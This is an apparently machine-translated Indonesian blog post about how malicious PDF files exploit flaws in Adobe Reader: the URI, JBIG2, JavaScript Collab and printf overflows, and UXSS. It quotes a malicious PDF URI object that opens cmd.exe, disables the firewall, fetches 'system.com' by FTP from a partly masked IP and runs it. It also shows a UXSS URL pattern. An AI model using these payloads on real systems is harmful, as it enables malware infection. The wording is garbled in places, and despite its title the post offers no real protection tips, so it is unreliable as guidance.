Lompat ke konten Lompat ke sidebar Lompat ke footer
Beranda / Tips dan Trik

Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus


Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus - Saat ini dokumen berbentuk file PDF semakin banyak digunakan. Alasan penggunaan format ini, adalah dokumen tidak bisa diubah-ubah. Tetapi celakanya oleh para pembuat malware, justru ini yang menjadi sasaran empuk untuk melakukan serangan. Para pembuat malware melakukan eksipoit pada sejumlah kelemahan yang ada pada PDF Adobe, sehingga format tersebut tak bisa digunakan. 

Lebih dari 70% serangan dilakukan melalui Trojan terhadap file PDF. Mayoritas penyerang berkembang dari metodologi serangan tradisional seperti email, ke serangan terhadap PDF, yang dianggap sebagai cara paling sederhana untuk menyebarkan malware ke seantero Internet.

PDF sering dijadikan target malware sejak melakukan plug-in support di web browser. Ketika pengguna mengunjungi sebuah web berbahaya, dokumen PDF dilayani dengan HTTP, dan selama malware masuk ke mesin pengguna tanpa disadari.


Belakangan ini ada banyak PDF berbahaya yang tersimpan di situs internet dan siap untuk menyerang pengguna. Seperti kita tahu, PDF adalah salah satu format file paling popular dan dipakai sebagai format dokumen standar di Amerika dan banyak negara lain, untuk mendistribusikan dokumen seperti laporan pajak dan dokumen resmi lain.

PDF juga banyak dipakai untuk format ebook. Ya, format ini sudah lama dipakai, namun serangan malware yang menyusup ke dalamnya baru mulai marak akhir-akhir ini.
Pertanyaanya adalah, mengapa PDF yang dijadikan media penyebar malware? Brikut adalah alasannya:


PDF dipakai secara luas (Laporan pajak, Slip pembayaran, ebook, dan sebagainya)
PDF mampu menjalankan konten aktiv seperti JavaScript
PDF mampu membuat request HTTP
PDF mampu menjalankan format rich media (.swf,.avi, .mpeg,. asf,.wmv, .wmx, dan .spl).


Berdasar  semua fitur itu, maka dapat dikatakan bahwa PDF tergolong sebagai konten yang aktif. Format lain PDF juga mampu menjadi sasaran, misalnya Flash (SWF), dapat menjadi lemah ketika dikombinasikan dengan PDF. Beberapa waktu terakhir diketahui bahwa tingkat kelemahan PDF semakin meninggi. Di bawah ini adalah grafik yang menunjukkan peningkatan kelemahan Adobe PDF yang cukup menjadi perhatian para penyerang dan peneliti antivirus. Serangan terhadap PDF meningkat seiring dengan berkurangnya solusi antivirus yang mampu mendeteksi tren serangan baru.

Industri antivirus perlu melakukan terobosan dalam menghadapi ancaman serangan terhadap PDF. Kami telah menerima banyak laporan mengenai file PDF berbahaya beserta infeksinya, mulai dari pelanggan dari skala rumahan hingga enterprise. Serangan PDF ini makin mudah terdistribusi ke seantero dunia maya melalui email dan HTTP.

Walau sejumlah perusahaan sudah menjalankan sistem keamanan dan memindai trafik demi memerangi ancaman itu, mereka hanya dapat memproteksi diri dari ancaman yang sudah dikenali, bukan jenis proteksi proaktif. Isu ini cukup serius saat ini, dan industri antivirus perlu menyiasatinya sebelum semakin parah.

Ragam Teknik Serangan
Kita akan membahas sejumlah kelemahan PDF dan teknik-teknik serangan yang digunakan untuk luput dari deteksi solusi antivirus. Berikut adalah daftar vulnerabilitas yang menjadi topik bahasan komunitas antivirus :

Vulnerabilitas PDF URI
Vulnerabilitas PDF J2BIG
Vulnerabilitas yang berkaitan dengan fungsi PDF JavaScript :
Metode Collab.collectEmaillnfo
Metode Collab.getlcon
Metode Utill.printf
UXSS dalam PDF


Vulnerabilitas URI
Kelemahan ini berhubungan dengan Adobe PDF’s mailto URI, dimana URIdipakai sebagai akses ke sistem file lokal pada komputer pengguna untuk melancarkan serangan. Pada kasus ini, penyerang dapat menciptakan rekues spesial URI. Sebagai contoh, rekues dibawah ini mampu mengakses lapisan perintah lokal Windows dan akan mengeksekusi sejumlah perintah.
<<URI(mailto:support@<site>.com%../../../../../../../../../windows/system32/cmd”.exe”
Perintah ini memungkinkan penyerang menciptakan dokumen PDF khusus yang mengandung URI buatan demi mengakses sumber-sumber lokal dan mengeksekusi beberapa perintah dasar melalui sistem akses file, dan mengunduh malware melalui internet sehingga menginfeksi komputer pengguna. Dibawah ini adalah contoh dimana file PDF berbahaya telah dibuat sedemikian rupa sehingga mengunduh malware dari internet dengan menggunakan shell perintah lokal untuk mengeksekusi perintah ftp.

<</Metadata90R/Pages50R/Type/Catalog>>
endobj
70obj
<<URI(mailto:support@<site>.com%../../../../../../../../../windows/system32/cmd”.exe””/c”set&cls&netsh firewall set opmode mode=disable&echo 0 81.95.xxx.181>i&echo
Binary>>i&echo get / system.com>>i&echo
Quit>>i&ftp-s:i-v-Anul&del/q i&start
System.com&**(1),cm\
d)/S/URI>>
endobj

File PDF yang sudah mengakali URI untuk mengeksploit kelemahannya akan mengakses cmd.exe dan mengeksekusi sebuah rantai perintah windows untuk melakukan aksi berikut :
1.      Menghilangkan firewall windows
2.      Menciptakan file temporer “i” dengan ftp commands;
3.      File”i” tersebut mengandung informasi untuk men-download file berbahaya, “system.com”;
4.      Menggunakan ftp.exe dan ftp command file “i” to untuk men-download malware
5.      Mengeksekusi malware yang sudah ter-down-load.

Para penyerang menyebarkan file tersebut dalam bentuk spam, dengan menggunakan teknik social engineering untuk memikat pengguna membuka file dengan menyamar menjadi pengirim tiket pesawat atau sejenisnya.
 

Vulnerabilitas JBIG2

JBIG2 adalah format kompresi gambar yang dapat dipakai sebagai sistem embedded dalam mendisplai gambar. Ketika sebuah dokumen PDF terdisplai maka sistem itu akan terurai menjadi gambar. Vulnerabilitas ini dapat dapat dieksploi melalui PDF khusus berisi stream JBIG2 dengan header yang sudah dikorup. Ketika stream ini diinterprestasikan oleh Acrobat reader maka akan menghasilkan arus buffer atau panahan.
Arus buffer ini dapat digunakanuntuk mengeksekusi kode arbitrasi salam konteks pengguna terkini melakukan logged-in. Para pembuat malware telah mengeksplotasi kelemahan ini untuk menyebarkan infeksi malware enggan menggunakan file PDF yang mengandung stream JBIG2 yang sudah termodifikasi. Hal ini akan menyebabkan crash pada Adobe Acrobat Reader.

Fungsi PDF JavaScript
Di bagian ini kami membahas beberapa vulnerabilitas terkini yang menggunakan obyek JavaScript dalam PDF. Sejumlah fungsi dalam JavaScript lemah dan tidak aman, mereka dapat dieksploitasi menggunakan JavaScript yang diakali bersama dengan PDF. Berikut beberapa contohnya:

*collabs.CollectEmaillnfo
Metode CollectEmaillnfo in Object Collab ini memiliki kelemahan yang menghasilkan arus penahan, sebab ia tidak melakukan validasi parameter ukuran sebelum proses dilakukan. Aturu buffer tersebut digunakan untuk mengeksplotasi PDF reader ketika PDF berisikan JavaScript mengeksekusi kode arbitasi.

Pada banyak kasus, JavaScript dikompresi dengan Zlib dan tidak terkompres pada load PDF. Sepertinya hampir semua kompresi digunakan untuk menyembunyikan JavaScript dari analis. Ada juga kasus dimana PDF mengandung JavaScript Stream yang dikompresi dengan alogaritma Zlib Extreme. Netralisasi kompresi stream ini menggunakan tool seperti pdfextract, PDFtk, atau inflate yang selayaknya menghasilkan teks JavaScript. Bagaimanapun juga, kasus ini menghasilkan Obfuscated JavaScript yang mengandung fungsi dekoding. Metode ini akan mengeksekusi kode terurai dari JavaScript. Kita dapat menggunakan malzilla untuk mengeksekusinya.

*Vulnerabilitas Collab.getIcon

Metode ini mengandung kelemahan arus buffer yang menjadi keunggulan penyerang dalam menyebarkan malware, dimana ada banyak file PDF berbahaya tersimpan di situs-situs dan terdistribusi melalui email. Eksploitasi metode ini sama dengan metode collectEmaillnfo.

Metode Util.printf
Metode penyebar malware ini menggunakan prinsip print dalam JavaScript dengan arus buffer yang memungkinkan file PDF berbahaya mengeksekusi kode shell untuk berkompromi dengan komputer pengguna.

UXSS (Universal Cross Site Scripting) dalam PDF

Vulnerabilitas ini berhubungan dengan bagaimana PDF yang ber-host di web dapat digunakan untuk menjalankan serangan XSS. Disini penyerang mengirim email dengan menggunakan teknik social engineering untuk mengakali konten pesan dan menyembunyikan link tersembunyi ke file PDF yang ada di server bersih. Ketika pengguna mengeklik link itu, penyerang melampirkan script yang sudah dieksekusi dalam meligitimasi sesi web : Kelemahan ini tergantung pada keyakinan si pengguna, dimana malware dapat dieksekusi sepanjang pengguna percaya bahwa mereka mengklik link yang benar.

Dibawah ini adalah contoh XSS sederhana dari PDFyang mengeksploitasi vulnerabilitas ini :
http://<somewebsite>.com/file.pdf#anything:javascript=malicous script
contoh:
http://<somewebsite>.com/file.pdf#anything:javascript=alert(‘Hai XSS’);

Bahasa programming berbeda yang mendukung PDFdapat diciptakan melalui API. Secara instan, dalam PHP atau Python dapat ditulis script sederhana untuk menghasilkan dokumen PDF dan script ini dapat ditaruh di server web yang mendukung.

Teknologi APIdapat menciptakan dan memodifikasi file-file PDF. Inilah yang kemudian disalahgunakan oleh penyerang yang menaruh script lawan ke web untuk menjalankan file PDF berbahaya ke seantero HTTP. Script ini dapat menangani file PDF yang berbeda seiap waktu dan tergantung pada permintaan, mereka dapat menggunakan obfuskasi berbeda untuk menempel pada script.

Hal ini membuat deteksi pada PDF menjadi sulit, sebab konten file internet berubah setiap waktu sebuah file PDF baru diminta oleh server. Script-script ini sudah siap untuk melakukan script kiddies pada siapa saja yang memerlukan dukungan server dan ruangan pada web. Dari cara inilah serangan PDF dapat menyebar cepat, dan teknik obfuskasi ini dengan mudah mengelak dari deteksi solusi antivirus.

Demikian Tips Mengatasi File PDF Agar Tidak Mudah Disusupi Virus, semoga bermanfaat bagi Anda, baca juga artikel lainnya mengenai Tips dan TrikKomputer.